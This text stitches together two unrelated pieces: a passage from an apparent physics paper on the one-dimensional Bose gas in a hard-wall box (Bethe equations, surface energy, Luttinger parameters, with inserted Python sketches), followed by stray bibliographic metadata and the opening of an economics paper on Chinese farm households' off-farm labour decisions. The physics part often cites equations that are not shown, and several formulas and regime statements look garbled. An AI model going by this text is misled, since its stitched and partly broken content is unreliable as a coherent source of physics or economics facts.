The ground state properties in the weak coupling limit are both subtle and interesting. So far it has proved difficult to reach the weak coupling regime via anisotropic trapping in experiments [22] and it is necessary to sharply define the criterion for weak coupling [41,43]. In the experiment, the 1D regime is reached if the radial zero point oscillation length l₀ = √(ℏ/(mω_⊥)) is much smaller than the axial correlation length, where ω_⊥ is the frequency of the radial trap and µ is the chemical potential of the 1D system; thus the condition for the 1D trapped system is µ ≪ ℏω_⊥. In general, γ ≪ 1 at zero temperature is referred to as the weak coupling regime. The Thomas-Fermi regime is usually reached for µ ≫ ℏω, where ω is the axial oscillation frequency of the harmonic trap. In this regime the kinetic energy term can be neglected and the system has a parabolic density distribution profile [11], referred to as the Thomas-Fermi BEC. However, in the regime µ ≪ ℏω the system is considered to have a macroscopic occupation of the ground state of the trap with a Gaussian density profile [41]. For the hard wall boundary conditions, the leading terms in the ground state energy can be obtained through asymptotic solutions of the Bethe equations (5) in analogy with the periodic case [34]. Here the wave numbers k_j for the ground state satisfy the algebraic equations (13). Algebraic equations of this kind for periodic boundary conditions have arisen in a number of different contexts [34], most notably in the integrable BCS pairing models [56]. The roots of such equations also describe the equilibrium positions of potentials in Calogero systems associated with Lie algebras [57]. The solutions of (13) give the ground state energy (14). This is quite different from the periodic boundary case, for which the leading term in the ground state energy per particle is E/N ≈ (N − 1)c/L. Here, due to the reflections at the boundaries, the ground state energy for hard wall boundary conditions is larger than the energy for periodic boundary conditions. For the integrable 1D Bose gas with periodic boundary conditions, the ground state energy per particle is known to be given by E/N ≈ (ℏ²n²/2m)(γ − 4γ^{3/2}/(3π)) [16,28,31]. We argue that this result holds in the regime 1/N² ≪ γ ≪ 1. The leading term of the ground state energy per particle for periodic boundary conditions, i.e., E/N ≈ (ℏ²n²/2m)γ, holds in the mean-field regime, i.e., γ ≪ 1/N², for which the correction term is proportional to γ² rather than γ^{3/2}. This discrepancy is not totally unexpected, as the Lieb-Liniger integral equation is only valid up to terms of order 1/L. If the interaction energy is much smaller than the scale of 1/L, i.e., if γ ≪ 1/N², results derived from the Lieb-Liniger integral equation are no longer valid in this very weak coupling regime. On the other hand, in the regime γ ≫ 1/N² the zero point oscillation kinetic energy is much smaller than the interaction energy and is thus negligible; it is here that one can derive the ground state energy asymptotically from the continuum integral equation. Finite-size discrepancies between the discrete and integral equation approaches have also been noted in Ref. [58].
The surface energy
Taking the logarithm on both sides of the Bethe equations (5) gives

k̃_j L = π m_j − Σ_{ℓ≠j} [ arctan((k̃_j − k̃_ℓ)/c) + arctan((k̃_j + k̃_ℓ)/c) ],    (15)

where j = 1, . . . , N and the m_j are ordered positive integers, i.e., 1 ≤ m_1 ≤ . . . ≤ m_N.
Here for later convenience we have denoted the Bethe roots by k̃. Our calculation takes advantage of the fact that in the thermodynamic limit, the ground state energy of the N boson system in a box of length L is equivalent to one half the energy of 2N bosons in a box of length 2L with periodic boundary conditions, as pointed out in [52]. It is thus convenient to derive the surface energy from a periodic system of 2N bosons of length 2L, for which the Bethe equations are given by (16) [16].‡

‡ Of course, one may also obtain the same free energy by treating the Bethe equations (15) directly, see, e.g., Ref. [59].
Here k_j > 0 and the I_j are half-odd integers. We now introduce the notation k_{−j} = −k_j and I_{−j} = −I_j. The difference between k̃_j and k_j can thus be written in the form (17), where j = −N, . . . , N and ε_j is a sign factor. The surface energy is then given by the corresponding energy difference. Using k̃_j − k_j < π/L and taking the Taylor expansion of equations (17) at k̃_j = k_j + Δk_j leads to equation (19). Let us define k_{j+1} − k_j = 1/(2Lf(k_j)), where f(k) is the distribution function [16]; then the Bethe equations (16) become an integral equation for f(k). Here we use the density n = 2N/(2L) and define the cut-off momentum B. Subsequently, equation (19) becomes a continuum expression, with ε(k) = sgn(k). Further defining f_f(k) = LΔk f(k), the surface energy is expressed in terms of f_f(k), which satisfies a corresponding integral equation. After the same rescaling as introduced in Ref. [16], i.e., k = Bx, c = Bλ, f(Bx) = g(x), we find the ground state energy per particle to be of the form (10). The bulk and surface energies are then given in terms of g(x) and the rescaled surface distribution, which satisfy the integral equations (27) and (28) together with a cut-off condition fixing B. There are various methods which can be used to solve the above equations (27) and (28). In the next section we derive analytic results from these equations in the strong and weak coupling limits.
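The bulk part of the problem reduces to the familiar Lieb-Liniger integral equation, which is straightforward to solve on a grid. The sketch below assumes the standard rescaled form of the bulk equation (the hard-wall surface equation (28) can be treated analogously); it is an illustration under that assumption, not the authors' code.

```python
import numpy as np

def lieb_liniger_bulk(lam: float, M: int = 400):
    """Iterate the rescaled bulk Lieb-Liniger equation
    g(x) = 1/(2*pi) + (lam/pi) * Int_{-1}^{1} g(y)/(lam^2+(x-y)^2) dy.
    Returns gamma and the bulk energy e0(gamma) in units hbar^2 n^2 / 2m."""
    x, dx = np.linspace(-1.0, 1.0, M, retstep=True)
    g = np.full(M, 1.0 / (2.0 * np.pi))
    kernel = lam / np.pi / (lam**2 + (x[:, None] - x[None, :])**2)
    for _ in range(5000):
        g_new = 1.0 / (2.0 * np.pi) + kernel @ g * dx
        if np.abs(g_new - g).max() < 1e-12:
            break
        g = g_new
    gamma = lam / np.trapz(g, x)
    e0 = (gamma / lam) ** 3 * np.trapz(g * x**2, x)
    return gamma, e0

gamma, e0 = lieb_liniger_bulk(lam=10.0)
print(gamma, e0, np.pi**2 / 3)  # strong coupling: e0 approaches pi^2/3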
Application of Wadati's power series expansion method
As remarked in references [52,55], the Lieb-Liniger integral equation is closely related to the Love equation for the problem of a circular plate condenser [60]. One can obtain a series expansion for the ground state energy from the integral equation [31]. This method has also been applied to the Yang-Yang integral equations for the thermodynamics [54] and to the Gaudin integral equation for the attractive δ-function interacting Fermi gas [55]. For the Bose gas with hard walls, Gaudin [52] found the leading surface energy term in the weakly interacting limit. In this section, we apply the Wadati method to obtain the leading terms in the ground state energy from the integral equations (27) and (28).
Tonks-Girardeau regime
In the strong coupling regime the bulk part of the ground state energy per particle is given by the known expansion [16,31,34], which agrees with the asymptotic result (11). Calculating the first two terms in the expansion of the distribution function (28) leads to the surface energy (34). We see that the constant term in the surface energy (34) is the same as in (12), but the leading correction term differs. Again this is because the continuum integral equation derived from the Bethe equations is only valid for terms of order up to 1/L.
Weak coupling regime
In this regime the leading terms of the distribution function can be found explicitly. The surface energy e_f ≈ (8/3)√γ follows from equation (28). Here we keep only the leading term, as for a large number of particles the contribution from the other terms is negligible. The ground state energy per particle in the regime 1/N² ≪ γ ≪ 1 is again of the form (10), where the leading bulk and surface energy terms are given by (36) and (37). So far we have derived some analytic results for the ground state energy of the interacting 1D Bose gas with hard wall boundary conditions. One may also perform direct numerical calculations using the integral equations (27) and (28), as originally done in the bulk [16]. In doing this we see that the ground state energy (10), with (11) and (12), is consistent with the result obtained from the integral equations (27) and (28) for γ > 1, with best agreement found for γ > 5 (see figure 3). A comparison between the analytic result and the numerical calculation for weak coupling is presented in figure 4. A discrepancy between the numerical and analytic results is evident for weak coupling, which implies that the next leading term in the surface energy (37) is necessary. As expected, there is a difference between the finite-size results and the limiting curve obtained in the thermodynamic limit.
Comparison with the 1D Bose gas trapped by harmonic potentials
The experimental realization of the Tonks-Girardeau gas trapped in harmonic potentials has involved the measurement of momentum distribution profiles [20,21], the ground state energy [22] and collective oscillations [23]. To model the experiments more closely it is desirable to take into account the 'soft' boundaries of the harmonic potential rather than the commonly used 'hard' boundaries of a box. Unfortunately the axial trapping potential breaks the homogeneity of the integrable model. However, if the density varies smoothly over a small interval, the systems under consideration can be treated as a uniform Bose gas in each small interval [11,41,43]. This quasiclassical approach is called the local density approximation and is used to study the density distribution profile in cases where the chemical potential is much larger than the level spacing ℏω in the 1D direction. For the equilibrium state the chemical potential of the system in a harmonic trap can be taken to be constant.

Figure 3. Comparison of the numerical solution of the integral equations (27) and (28) with the analytic expression for strong coupling (10), with (11) and (12), derived from the discrete Bethe equations (5). A generally good agreement between the numerical and analytic results is visible. The lowest curve is obtained in the thermodynamic limit.
Applying the local density approximation to the 1D Bose gas with periodic boundary conditions at zero temperature, we have

µ(n(z)) + V(z) = µ₀,    (38)

where µ(n(z)) is the local chemical potential of the uniform system and V(z) = (1/2)mω²z² is the local trapping potential. We make the Ansatz in which R is the atomic cloud radius, given by R = √(2µ₀/(mω²)). The density profile of the system can then be obtained by using the normalization condition ∫ n(z) dz = N. With the help of the analytical expressions for the ground state energy of the interacting Bose gas it is now straightforward to derive the density profiles in the Thomas-Fermi and Tonks-Girardeau regimes.

Figure 4. Comparison of the numerical solution of the integral equations (27) and (28) with the analytic expressions for weak coupling, (36) and (37). A slight discrepancy between the numerical and analytic results appears for weak coupling. This discrepancy becomes small if the particle number is very large. The analytic expressions are expected to hold in the region 1/N² ≪ γ ≪ 1.
For the Thomas-Fermi regime, the energy per particle is given by E₀ = (ℏ²/2m) n(z) c, which leads to a parabolic density profile with central density n₀ and Thomas-Fermi radius R_TF. Here c = 2/|a_{1D}|. The average energy per particle follows by averaging over this profile. In the Tonks-Girardeau limit, the local chemical potential is µ(n(z)) = (ℏ²π²/2m) n²(z) and the density distribution is given by n(z) = n₀ √(1 − z²/R²). The average energy per particle in the Tonks-Girardeau limit is E_TG ≈ (1/4)Nℏω. The density profile has been studied in the whole regime [11]. The cloud size expands as the interaction strength increases. In the Tonks-Girardeau regime, the interaction-dependent radius is given approximately by R_TG ≈ √(2Nℏ/(mω)). Indeed, this would slow down the increase of the average energy with increasing interaction strength in the weak coupling regime if we consider the length of the hard wall box varying with γ via the relation L = 2R. However, further refinements are necessary for finite systems, i.e., for a finite number of confined bosons.
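A small sketch of the two limiting local density approximation profiles discussed here may be helpful. It assumes the standard parabolic (Thomas-Fermi, µ ∝ n) and square-root (Tonks-Girardeau, µ ∝ n²) forms; normalization constants are omitted, and the names are illustrative.

```python
import numpy as np

def lda_profile(z, R, regime="TF"):
    """Local density approximation profile shapes, up to the overall
    normalization fixed by integrating n(z) to N. Thomas-Fermi (mu ~ n)
    gives a parabola; Tonks-Girardeau (mu ~ n^2) gives a square root."""
    body = np.clip(1.0 - (z / R) ** 2, 0.0, None)
    return body if regime == "TF" else np.sqrt(body)

z = np.linspace(-1.2, 1.2, 7)
print(lda_profile(z, R=1.0, regime="TF"))
print(lda_profile(z, R=1.0, regime="TG"))
```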
In the previous sections we have discussed in detail the derivation of the ground state energy of the 1D interacting Bose gas confined in a hard wall box. This integrable system is much easier to treat theoretically than the system with harmonic trapping. The experimentally measured 1D energy has been compared with theoretical curves obtained using the local density approximation [22]. However, the theoretical predictions are not convincing, for a number of reasons. First, it is not clear whether the quantity γ_avg presented in the figures of Ref. [22] corresponds to the dimensionless interaction strength γ in the uniform Hamiltonian (1). Secondly, the interaction strength region measured, up to γ_avg < 6, may be too small to be sure that the Tonks-Girardeau regime has been reached. Our theoretical results indicate that finite-size effects induced by the number of particles, the system size and the boundary conditions are not negligible in the weak coupling and Tonks-Girardeau regimes.
There is some similarity between harmonic trapping and hard wall box confinement. For γ = 0, the kinetic zero point oscillation energy is (1/4)ℏω for axial harmonic trapping. If we confine the 1D Bose gas in a hard wall box of length L = 2R₀, where R₀ = √(2ℏ/(mω)) is the characteristic length of the harmonic oscillator, the kinetic energy per particle is (π²/16)ℏω for the hard wall boundary conditions, which is much larger than the kinetic zero point oscillation energy for harmonic trapping. For the Tonks-Girardeau regime, if we confine the 1D Bose gas in a box of length L = 2R_TG, the 1D energy per particle is almost the same as the average 1D energy E_TG ≈ (1/4)Nℏω for harmonic trapping.
The boundary effects are more pronounced in the weak coupling limit. If one takes the same zero point kinetic energy and 1D ground state energy for the hard wall box as for harmonic trapping, the size of the hard wall box for the γ = 0 and γ = ∞ limits should be L₀ = π√(2ℏ/(mω)) and L_TG = π√((2ℏN/(mω))(1/3 + 1/(2N))), respectively. Recall that we plotted the 1D temperature as a function of the interaction strength for the hard wall boundary conditions with L_TG = 32.61 µm and L = 2R_TG = 35.25 µm in figure 2. These numerical values follow on inserting the physical parameters for ⁸⁷Rb atoms into the above results, with N = 37, m = 0.1454 × 10⁻²⁴ kg and ω = 2π × 27.5 Hz. In this way figure 2 can be compared with the experimental data in Figures 3A and 4 of Ref. [22]. As observed in Ref. [22], the radius R of the atomic cloud for harmonic trapping increases rapidly with the interaction strength in the weak coupling regime, causing the average energy to increase rather slowly in comparison with the hard wall case.
Luttinger liquid behaviour
Many one-dimensional models behave like Tomonaga-Luttinger liquids due to the universality of the dispersion relation and correlation behaviour. The low energy properties are characterized by power-law decay in the correlation functions with gapless excitations. A universal description of the low-energy properties of one-dimensional interacting systems has been given in terms of harmonic liquid theory [25]. The 1D Bose and Fermi gases are included in this theory. The Luttinger liquid behaviour of the 1D Bose gas has recently been studied with hard wall boundary conditions [47]. It was found that the particle density exhibits Friedel oscillations with respect to the distance to the boundaries. The phase and density correlations are influenced by the hard wall boundary effects. Here we examine this behaviour in the context of the integrable model.
The Luttinger parameters
The harmonic liquid approach to the low energy excitations of the 1D Bose gas is described by the effective Hamiltonian (46) [25,40,47]. Here v_J is the phase stiffness, v_N is the density stiffness and v_s is the sound velocity. For the long-wavelength density fluctuations the density ρ(x) = ρ₀ + Π(x) has small deviations from the ground state density ρ₀. The boson field operator is defined in terms of the density and phase fields. The effective Hamiltonian (46) reduces to the quantum hydrodynamic Hamiltonian (47) [40,47] with regard to the particle-hole excitation modes. Here ω(q) = v_s q for q ≪ ρ₀ and the wave number is restricted to q > 0. N is the total number of particles in the system and N₀ is the number in the ground state, with b†(q) the creation operator of elementary excitations. The low energy excitations are well described by the effective Hamiltonian (47) with Luttinger parameters v_s and K. We now study the effect of the hard walls on the Luttinger liquid parameters. The density stiffness and sound velocity can be derived from the ground state energy via the relations [35,40]

v_N = (L/π) ∂²E₀/∂N²,    v_s = √(v_N v_J),    K = v_F/v_s,

with v_J = v_F by Galilean invariance. Although the regime γ ≪ 1/N² is difficult to achieve in experiments, the boundaries nevertheless have a significant effect on the Luttinger behaviour in this regime. Using the ground state energy (14) we obtain the parameters in this regime; here the Fermi velocity is v_F = πn/m. We see that the Luttinger liquid parameter K ≈ [1/N² + γ/(2π²)]^{−1/2} tends to infinity for γ → 0 at a faster rate than for periodic boundaries, for which K ≈ π/√γ [40] (see Figure 5). The enhancement of K for hard wall boundary conditions leads to a very slow decay of the phase correlations [40,47].
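Given a numerical bulk energy e(γ), the Luttinger parameters can be extracted by finite differences. The sketch below uses the standard hydrodynamic relation for the sound velocity of the Lieb-Liniger gas, v_s/v_F = √(3e − 2γe′ + γ²e″/2)/π, which follows from v_s² = (n/m)∂µ/∂n with E/N = (ℏ²n²/2m)e(γ); the strong-coupling expansion used in the check is the known bulk result e(γ) ≈ (π²/3)(1 − 4/γ + 12/γ²), not a formula quoted from this paper.

```python
import numpy as np

def luttinger_K(gamma: float, e, h: float = 1e-3) -> float:
    """K = v_F / v_s from a dimensionless bulk energy function e(gamma),
    via v_s/v_F = sqrt(3e - 2*gamma*e' + gamma^2*e''/2) / pi, with
    central finite differences for the derivatives."""
    e0 = e(gamma)
    e1 = (e(gamma + h) - e(gamma - h)) / (2 * h)
    e2 = (e(gamma + h) - 2 * e0 + e(gamma - h)) / h**2
    vs_over_vf = np.sqrt(3 * e0 - 2 * gamma * e1 + 0.5 * gamma**2 * e2) / np.pi
    return 1.0 / vs_over_vf

# Strong-coupling check: e ~ (pi^2/3)(1 - 4/g + 12/g^2) should give
# K close to the known asymptotic value 1 + 4/gamma.
g = 50.0
print(luttinger_K(g, lambda x: np.pi**2 / 3 * (1 - 4/x + 12/x**2)), 1 + 4/g)
```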
In the Thomas-Fermi regime 1/N² ≪ γ ≪ 1 we use the ground state energy of Section 5.2 to obtain the parameters, while in the strong coupling regime we use the result (9). We show a comparison of the Luttinger parameter K for the different boundary conditions in the Thomas-Fermi regime and the strong coupling regime in Figure 6. The parameter K varies from infinity to 1 + 1/(4N). For weak coupling, K increases more quickly than in the periodic case. In the strong coupling limit, K tends to 1 for both cases.
The density fluctuations are suppressed in the weak coupling limit, while they are enhanced in the strong coupling limit. This can be seen directly from the leading term of the density expectation value [47]

ρ(x) ≈ n { 1 − (1/π) [ π/(2nL |sin(πx/L)|) ]^K sin(2πnx) },    (56)

with a ≪ x ≪ L − a, where a is the cut-off length from the boundaries. For weak coupling we find a ≈ 1/(n√γ), while in the strong coupling limit a ≈ 2/(πn). In the weak coupling regime, the density fluctuations are suppressed due to the coherence of the wave functions. However, in the strong coupling limit, density fluctuations are evident due to the decoherence of the wave functions. These effects can be seen directly from equation (56).
Local correlation g₂
It is well known that the local correlations in the 1D Bose gas decay algebraically [38,41]. As in the periodic case, we can calculate the two-body correlation functions from the ground state energy for the hard wall boundary conditions. Using the Hellmann-Feynman theorem, the g₂(γ) correlation function is obtained by differentiating the ground state energy with respect to the coupling [40,43]. We thus obtain the correlation function g₂ in the various regimes, to be compared with the corresponding results for the periodic case. The enhancement of the correlation function g₂ by the hard walls is largest for weak coupling, as can be seen in Figure 7. This is due to backward scattering increasing the probability of two particles scattering, in comparison with only forward scattering in the periodic case.
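The Hellmann-Feynman step can be carried out numerically. Writing E/N = (ℏ²n²/2m)e(γ), the normalized local pair correlation in the bulk is g₂/n² = de(γ)/dγ; the sketch below checks this against the known strong-coupling bulk expansion e(γ) ≈ (π²/3)(1 − 4/γ), which gives g₂/n² → 4π²/(3γ²). Both expressions here are standard bulk results used for illustration, not the hard-wall formulas of this section.

```python
import numpy as np

def g2_normalized(gamma: float, e, h: float = 1e-4) -> float:
    """Hellmann-Feynman: g2/n^2 = d e(gamma)/d gamma for a dimensionless
    ground-state energy function e(gamma), by central differences."""
    return (e(gamma + h) - e(gamma - h)) / (2 * h)

g = 20.0
print(g2_normalized(g, lambda x: np.pi**2 / 3 * (1 - 4 / x)),
      4 * np.pi**2 / (3 * g**2))  # the two values should agree closely
```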
Conclusion
We have considered the integrable interacting 1D Bose gas in a hard wall box. The exact Bethe Ansatz solution for the wavefunctions and eigenspectrum has been outlined in Appendix A. The ground state energy, including the bulk and surface energies, has been derived from the Bethe equations (5) in different regimes. For N bosons, these are (i) the mean-field regime γ ≪ 1/N², where the interaction energy is much smaller than the kinetic energy, (ii) the Thomas-Fermi regime 1/N² ≪ γ ≪ 1, and (iii) the strongly interacting Tonks-Girardeau regime γ ≫ 1. These results have been compared with the ground state energy obtained from the continuum Lieb-Liniger-type integral equations in the thermodynamic limit. The latter results, (26)-(28), are in agreement with those found by Gaudin [52]. The emphasis of our approach has been on finite systems and the effects of the hard wall boundary conditions. It is seen that the finite-size results compare well with those from the continuum integral equation, with the exception of the mean-field regime, where the integral equation is not expected to hold.
A connection to the 1D Bose gas trapped by a harmonic potential has also been made. The Luttinger liquid parameters, such as the density stiffness and sound velocity, and the local correlation function g₂ have been calculated from the ground state energy in the various regimes. It is clearly seen that the hard wall boundary conditions have a larger influence on the phase correlations in the weak coupling limit. The enhancement of the Luttinger liquid parameter K strongly suppresses the fluctuations in the ground state density expectation value. The local correlation g₂ is enhanced by the hard wall boundary conditions. A significant effect of the hard wall boundary conditions is that the wave-like properties of the bosons become more pronounced in the weak coupling regime. Significantly, the 1D interacting Bose gas confined in a hard wall box can be experimentally realized. Future experiments, highlighting the subtle interplay between system size and boundary effects in ultracold quantum gases, are eagerly awaited.
Observe that for c = 0, the wave function (A.5) reduces to the standing wave Ψ(x₁, x₂) = sin(k₁x₁) sin(k₂x₂) + sin(k₂x₁) sin(k₁x₂), with k₁ = n₁π/L and k₂ = n₂π/L for n₁ and n₂ non-zero integers. When c increases, k₁ and k₂ also increase, as if the boson mass increases. The standing wave properties are gradually lost as the interaction becomes stronger.
In a similar way, we can derive the N-particle wave function given in (3). The coefficients are connected to each other via

A(. . . , ε_i k_i, . . . , ε_j k_j, . . .) = [(ε_i k_i − ε_j k_j + ic)/(ε_i k_i − ε_j k_j − ic)] A(. . . , ε_j k_j, . . . , ε_i k_i, . . .),    (A.7)

for i < j. Application of the boundary conditions leads to the explicit form of the coefficients given in (4), along with the Bethe equations (5). The wave function is unnormalized.
"year": 2005,
"sha1": "58dfef1b373cf563b185faa6fc6f2783d5c88240",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/cond-mat/0505550",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "c5f260d3289d044871eb05fbf21022a87e284b42",
"s2fieldsofstudy": [
"Physics",
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics",
"Physics"
]
} |
145024822 | pes2o/s2orc | v3-fos-license | Too Risky to Focus on Agriculture ? An Empirical Study of China ’ s Agricultural Households ’ Off-Farm Employment Decisions
This paper investigates China’s agricultural households and their individual members’ off-farm labor supply decision in response to farm production risks and a number of other factors (e.g., demographic characteristics, farm characteristics, and local market features). Whether and to what extent farming risks may affect farmers’ off-farm employment in China are rarely studied. Our paper provides an empirical study to demonstrate that agricultural production risks significantly impact off-farm labor supply in rural China. The impacts of associated variables on households off-farm labor supply decisions are quantified using a sample of large–scale nationwide household finance survey in 2010. The results suggest that off-farm employment serves as a risk adaption strategy for Chinese farmers. Policy suggestions on retaining farmers to focus on agricultural production are discussed.
Introduction
The economic reforms of China that started nearly four decades ago have led to dramatic changes in the economic landscape of the nation. The whole world has witnessed China's remarkable success in economic growth and poverty reduction. From 1981 to 2010, China's national GDP rose from 3.59 trillion Yuan to 50.21 trillion Yuan [1] and the poverty rate declined from 88.32% to 11.2% [2]. In particular, the expansion of the rural economy has driven a large part of this success [3,4]. Farmers' incomes have risen significantly and hundreds of millions of rural households have escaped poverty during this period [5][6][7]. Specifically, CPI (Consumer Price Index) adjusted per capita rural income increased more than fivefold, from 1786.33 Yuan in 1978 to 10,990.70 Yuan in 2012 [8]. During this period, many farmers and their family members began to engage in economic activities off their land, resulting in great prosperity of the non-farm economy. As a result, non-farm employment in rural communities rose from 108.7 million to 271.8 million and its share of the entire rural workforce increased from 22.8% to 52.6% between 1990 and 2010 [1]. The booming non-farm economy in rural China has greatly improved farm household economic well-being, through both employment expansion and rural income growth [9][10][11]. In particular, off-farm earnings rose to as much as 53% of rural household incomes in 2012 [8].
Off-farm employment in rural China has attracted much research interest due to the huge size of the rural labor force and the increased reliance on off-farm income by Chinese farm households. Previous literature showed that two groups of factors explain the observed labor supply: demographic characteristics and social networks. Using a Probit model, De Janvry et al. [7] found that higher education and more social network connections increase the likelihood that a rural Chinese household allocates its labor towards off-farm activities. Similar results are presented in Chen et al. [12], where education, household size and social networks were found to be crucial in deciding the locations of employment chosen by rural households. Zhang et al. [13] concluded that rural workers have been increasingly rewarded for their education through both better off-farm job access and higher wages. Their results suggest that investments in rural education are desperately needed to improve agricultural productivity and facilitate the demographic and economic transition of the rural areas. Restructuring the rural education system might enhance rural human capital accumulation and economic development. Zhang et al. [14] concluded that there has been an overall increase in off-farm participation. Young urban migrants from rural regions have driven a large part of this increase. Gender differences have also been emphasized. A number of studies demonstrated that the determinants of off-farm labor supply participation vary significantly by gender [14][15][16].
The existing literature on off-farm labor supply in China centers on applying appropriate econometric methodologies to identify the impacts of various factors. However, we found a significant gap in the literature: agricultural production risks are rarely considered as a driving factor of farmers' labor allocation in China. Even in a global context, the only relevant studies we found are Mishra and Goodwin [17] and Mishra and Holthausen [18], which analyzed the impacts of risks of farming and off-farm incomes on US farmers. Given the increasing importance of risk management in China's agricultural industries, such an oversight of production risks in the study of off-farm labor supply calls for further investigation. In addition, we found a paucity of literature considering regional heterogeneity when studying the off-farm employment decision in rural China. Our study strives to fill these information gaps. Thus, we focus on the following research questions: (1) How does a Chinese farm household decide whether to take off-farm jobs? (2) What are the driving forces of such a decision? (3) For a Chinese rural household, does such a labor supply decision respond to agricultural production risks? (4) Does this labor allocation decision differ across regions? The overall goal of this paper is to contribute to the assessment of agricultural households' decision-making on labor allocation in China.
Although production risks present an increasingly crucial challenge to agriculture, whether and to what extent such risks impact Chinese farmers' engagement in off-farm employment has yet to be studied. Motivated by previous studies of US farmers [17,18], our study attempts to address agricultural production risks and evaluate their impacts in China. We empirically analyze a sample of China's rural households' labor supply decisions. This paper provides important economic insights and policy implications for both academic and public audiences.
Our empirical analysis uses a survey of Chinese households (the China Household Finance Survey) conducted in summer 2011. We focus on the households in which at least one member participated in farming activities in 2010. Our data include 2352 rural households from 21 provinces. A binary Logit model is adopted. The dependent variable is defined as whether a household participated in any form of off-farm income-generating activity that requires their own labor input. The set of explanatory variables includes the variation of farm incomes, the expectations of farming and off-farm incomes, household demographics (i.e., age and household size) and other relevant regressors. Furthermore, for the purpose of comparison, we also evaluate labor supply decisions at the individual level. In general, the results are consistent with our expectations. In particular, the risks of agricultural production are found to be a significant factor for Chinese farmers in their labor allocation decisions.
This paper fills the gap in the existing literature that agricultural production risks have never been considered when evaluating rural households' off-farm labor supply in China. Our empirical analysis verifies our hypothesis that agricultural risks are a significant determinant of off-farm employment in China. Using our sample, we also identify and evaluate a number of important factors. In addition, we recognize and quantify regional heterogeneity in rural households' off-farm labor supply decisions.
The rest of the paper is organized as follows. In Section 2, we introduce the data sets that are used for the analysis. Section 3 describes the empirical analysis and results that explain the determinants of employment decisions at both the household and individual levels. Conclusions and policy implications are discussed in the final section.
Data
This study focuses on the rural households which were involved in agricultural activities in the sample year 2010. The China Household Finance Survey (CHFS) data are provided by the Survey and Research Center of China Household Finance, Southwestern University of Finance and Economics, Chengdu, China [19]. The CHFS survey contained 3244 rural households from different provinces of China. Among the 3244 rural households, 1526 had both on-farm and off-farm sources of income while 829 had income exclusively derived from farm activities. The remaining 889 households took non-farm jobs as their exclusive means of income. Since this study only concerns farmers' labor supply decisions, these 889 rural non-farming households are excluded from our sample. Therefore, this study concentrates on the households that either generate income exclusively from farming or have mixed income sources from both on- and off-farm activities. They received several categories of off-farm income: (1) income earned by self-employment in non-farm activities such as industrial and/or commercial activities; (2) income earned from formal or informal wages, including salary, allowance, bonus, dividend, and other sorts of remuneration; and (3) other income not related to farming. Since there are only three rural households in Shanghai, in order to avoid a biased representation of farm households for the region, we rule out Shanghai from our study area. As a result, our sample consists of 2352 farm households from 21 provinces.
Because agronomic and socioeconomic conditions differ significantly across the nation, we speculate that such differences in the returns to both farming and off-farm jobs may result in heterogeneous patterns of farmers' off-farm labor supply. We include a set of variables to represent different regions while not losing too many degrees of freedom in the regression. Therefore, we group the locations of our sampled farm households into four regions: (1) Western region; (2) Northeastern region; (3) Central region; and (4) Eastern region. The geographic boundaries of these four economic regions were defined by the central government during the Eleventh Five-Year Plan of China and have been widely used since then. Our study area with regional divisions is presented in Figure 1.
Furthermore, we examined the distribution of farm income using multiple data sources. We found that per acre farm incomes in the CHFS data set in 2010 and in the National Bureau of Statistics of China (NBSC) data set from 2005 to 2009 are indeed log-normally distributed, as illustrated in Figures 2 and 3.
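One way to check a log-normality claim of this kind is to fit a log-normal distribution and test the log-transformed values against normality. The sketch below uses synthetic stand-in data, since the CHFS/NBSC series are not reproduced here; all names and parameter values are illustrative.

```python
# Illustrative log-normality check; the income series is synthetic,
# not the actual CHFS or NBSC data.
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
income = rng.lognormal(mean=0.5, sigma=0.8, size=2352)  # hypothetical sample

shape, loc, scale = stats.lognorm.fit(income, floc=0)
log_inc = np.log(income)
# KS test of log-income against a fitted normal (approximate, since the
# parameters are estimated from the same sample).
ks = stats.kstest(log_inc, "norm", args=(log_inc.mean(), log_inc.std()))
print(f"sigma={shape:.2f}, scale={scale:.2f}, KS p-value={ks.pvalue:.3f}")
```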
Table 1 summarizes farm household statistics for two household categories. Category one comprises households that participated in both farming and off-farm activities, and category two comprises households that exclusively participated in farming activities. As described by these data, on average, households that had both on- and off-farm sources of income have a larger household size, younger family members, a higher education level, less farming experience, a smaller farmland size and a slightly shorter distance to the county center compared to those that solely engaged in agricultural production.
In addition to the household level analysis, we also investigate each individual farmer's off-farm labor supply decision. Therefore, we use individual level data from our sample. Among these 2352 farm households, the individual household members are classified into five categories: (1) pure farmers (a.k.a. full-time farmers) who only engaged in farming activities; (2) farmers who primarily engaged in farming work but also had some off-farm income source (a.k.a. part-time farmers); (3) non-farmers who exclusively worked outside the farm; (4) dependents who were under 16 years old (given China's compulsory education law, the 9-year compulsory education system requires all children to remain full-time students until graduating from junior secondary school, when they would be at least 16 years old; however, there might be some children who started to participate in farming activities before that age, as pointed out by one anonymous referee, but since that proportion is small and the relevant information is not available in our sample, we assume that all children remain dependents until 16 years old); and (5) other unemployed adult individuals who did not have any job-related information. This study focuses on the first three categories, who qualify as labor suppliers in the rural sector. Table 2 presents individual statistics for each category. Among working-age individuals, off-farm workers (types two and three) are more likely to be single young males with higher education levels and smaller farmland holdings.
Econometric Models
To assess farmers' decisions of whether to take an off-farm job, a binary Logit model is applied to identify the determinants of household-level participation in off-farm activities. The binary response variable is defined as whether a farm household had any type of off-farm income source. We consider that employment decisions are made upon information available at the beginning of a production cycle, such as own characteristics and prior information. The model specification can be expressed as follows:

Y*_i = R_i'γ + X_i'β + ε_i,    Y_i = 1 if Y*_i > 0, and Y_i = 0 otherwise,

where Y*_i is a non-observed continuous latent variable and Y_i is an observed binary variable. Y_i = 1 if the farm household participates in any off-farm activity, and Y_i = 0 otherwise. R_i is a vector of historical income information. X_i is a vector of own characteristics. γ and β are parameters associated with R_i and X_i, respectively. ε_i is a random disturbance term following a standard logistic distribution.
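A sketch of how such a specification can be estimated is given below. The file name and column names are placeholders, not the actual CHFS variable names, and the formula is only meant to mirror the structure described in this section.

```python
# Sketch of the household-level participation Logit; names are hypothetical.
import pandas as pd
import statsmodels.formula.api as smf

df = pd.read_csv("chfs_households.csv")  # hypothetical prepared data file

model = smf.logit(
    "offfarm ~ farm_income_sd + farm_income_mean + wage_income_mean"
    " + hh_size + male + dist_county + farmland + dependents"
    " + age + I(age**2) + educ + I(educ**2) + farm_exp"
    " + C(region, Treatment(reference='Northeast'))",  # reference category
    data=df,
).fit()
print(model.summary())
```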
